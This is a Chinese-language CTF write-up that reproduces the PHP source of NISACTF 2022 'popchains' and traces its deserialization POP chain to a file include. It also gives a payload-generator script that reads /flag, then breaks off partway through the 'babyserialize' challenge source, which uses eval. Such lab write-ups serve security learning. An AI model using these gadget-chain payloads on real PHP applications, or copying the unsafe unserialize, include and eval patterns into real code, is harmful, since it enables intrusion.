目录
[NSSCTF 2022 Spring Recruit]ezgame
前言:
没时间参加比赛,来复现一下。
[NISACTF 2022]popchains
__invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法
__construst():具有构造函数的类在创建新对象的时候,回调此方法
__destruct():反序列化的时候,或者对象销毁的时候调用
__wakeup():反序列化的时候调用
__sleep():序列化的时候调用
__toString():把类当成字符串的时候调用,一般在echo处生效
__set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
__get():读取不可访问或者不存在的属性的时候,进行赋值
__call():在对象中调用一个不可访问的方法的时候,会被执行
进入环境:
直接是代码审计环节:
Happy New Year~ MAKE A WISH
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
/**********************Try to See flag.php*****************************/
一般的思路,都是先看出口,也就是我们能够利用的点。
这里看到
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);}
Try_work_Hard 类中 有个文件包含,我们追加上去看看哪里调用了 append 函数。
public function __invoke(){
$this->append($this->var);
}
}
类中的 __invoke 方法 调用了append 传入的$var 。__invoke 的定义是,当一个对象被当函数一样调用的时候 例如:
$a = new test();
$a ();
这样就会触发 __invoke 方法. 那么我们继续追踪 哪里可以调用 __invoke。.
看到 Class MAKE_a_Change 类中:
public function __get($key){
$function = $this->effort;
return $function();
}
}
把$func 对象当作了函数来调用。而定义的__get 该如何 调用呢?
__get 魔术方法 是当访问一个类中的属性不存在或者privte 的时候 会被调用。
在 Class Road_Is_Long 中:
public function __toString(){
return $this->string->page;
}
如果 $this ->string = MAKE_a_Change的话,就会访问其page 属性,而其类中没有此方法则会调用__get()
那么再来看看 __toString 方法如何调用:
定义是 __toString(),类被当成字符串时触发。
找了半天,没找到哪里有echo ,只有这个地方有echo, 应该就是 正则匹配这个地方 ,如果$page 是一个对象,那么进入正则 $this->page 当做了字符串去匹配了。也就触发了 __toString
那应该就是 把payload 打进去 就自动触发 __toString 了吧 。
整理下思路:
__wakeup() -> 创建 page 为Road_is_Long 类本身 => __toString -> $this->Make_a_change => __get () $this->effort = make_a_change()=> __invoke() -> => append() => include($value); value=flag.php 。
好,构造。
<?php
class Road_is_Long{
public $page;
public $string;
}
class Try_Work_Hard{
protected $var = "/flag";
}
class Make_a_Change{
public $effort;
}
$road1 = new Road_is_Long();
$road2 = new Road_is_Long();
$try = new Try_Work_Hard();
$make = new Make_a_Change();
$road1->page = $road2;
$road2->string=$make;
$make->effort=$try;
$ser = serialize($road1);
echo urlencode($ser);
直接传入就得到flag。
[NISACTF 2022]babyserialize
考点:
php反序列化pop链构造。
代码审计。
解题:
__invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法
__construst():具有构造函数的类在创建新对象的时候,回调此方法
__destruct():反序列化的时候,或者对象销毁的时候调用
__wakeup():反序列化的时候调用
__sleep():序列化的时候调用
__toString():把类当成字符串的时候调用,一般在echo处生效
__set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
__get():读取不可访问或者不存在的属性的时候,进行赋值
__call():在对象中调用一个不可访问的方法的时候,会被执行
直接来吧:
<?php
include "waf.php";
class NISA{
public $fun="show_me_flag";
public $txw4ever;
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
function __call($from,$val){
$this->fun=$val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei{
public $ext;
public $x;
pu